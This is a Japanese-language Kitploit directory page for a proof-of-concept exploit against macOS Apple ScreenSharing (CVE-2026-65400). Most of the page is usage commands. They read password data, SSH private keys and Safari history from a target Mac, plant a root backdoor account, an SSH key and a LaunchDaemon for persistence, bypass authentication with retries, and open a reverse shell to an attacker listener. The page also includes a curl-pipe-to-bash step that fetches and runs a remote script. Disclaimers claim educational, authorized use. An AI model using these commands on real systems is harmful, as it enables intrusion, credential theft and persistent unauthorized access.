Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-65400 — CVE-2026-65400 向けの概念実証エクスプロイトで、Apple ScreenSharing を介して macOS 上で認証済みファイル読み書き、リバースシェル、および永続化を可能にします。 | Kitploit
ツール/GitHubGitHub/horkimhab/cve-2026-65400
特権昇格永続化メカニズムエクスプロイトポストエクスプロイト認証学習と教育リモートアクセスツール
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

CVE-2026-65400 向けの概念実証エクスプロイトで、Apple ScreenSharing を介して macOS 上で認証済みファイル読み書き、リバースシェル、および永続化を可能にします。

リポジトリを見る
31922日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

CVE-2026-65400

Donate

Support the maintenance of this project with PayPal or by scanning the QR code below.

paypal

QR code for donation

⚡ Simple Usage

このプロジェクトは、以下のような安全で許可された環境でのみ使用してください。

  • ローカル仮想マシン
  • Docker コンテナ
  • 分離されたラボ環境
  • 許可されたペネトレーションテスト環境

セットアップ例:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

使用例:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

注記:

  • 他のプロジェクトからクローンした場合、ネストされたディレクトリ .git をクリアするために curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y を実行する必要があります。
  • 例: cve-2025-46822.sh、cve-2025-46822-lab.sh、...

Credit or Reference

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Educational Security Research Repository

管理された環境でサイバーセキュリティの概念を学習、テスト、研究するためのリポジトリです。


⚠️ Security & Legal Disclaimer

Purpose

このリポジトリは、教育および許可されたセキュリティ研究のみを目的としています。

ユーザーが以下について学ぶのを支援するために設計されています。

  • セキュリティの脆弱性
  • サンドボックスと分離の概念
  • 安全なコーディングと防御的プラクティス

Authorized Use Only

このリポジトリは、許可を得た環境でのみ使用してください。例:

  • 個人ラボまたは仮想マシン
  • Docker または分離環境
  • 許可されたペネトレーションテスト
  • サイバーセキュリティトレーニングまたは学術研究

許可されていない、または違法な使用は固く禁止されています。


No Liability

作者および貢献者は、このプロジェクトによって引き起こされた損害、誤用、法的問題、損失について責任を負いません。

このリポジトリを使用することで、以下に同意したことになります。

  • 自己の行動に責任を持つこと
  • 法的かつ倫理的に使用すること
  • プロジェクトは保証なしで提供されること

Ethical Use

このプロジェクトは以下を目的としています。

  • 防御的セキュリティ研究
  • サイバーセキュリティ教育
  • 脆弱性の認識
  • 安全なシステムおよびソフトウェア研究

責任ある開示の慣行に従い、適用されるすべての法律を遵守してください。


Contact

責任ある開示や協力については、GitHub を通じてリポジトリのメンテナに連絡してください。


Related Project

許可されたセキュリティ研究と教育を目的とした追加の CVE 概念実証リソースについては、PoC CVE Collection を参照してください。

ツールをダウンロード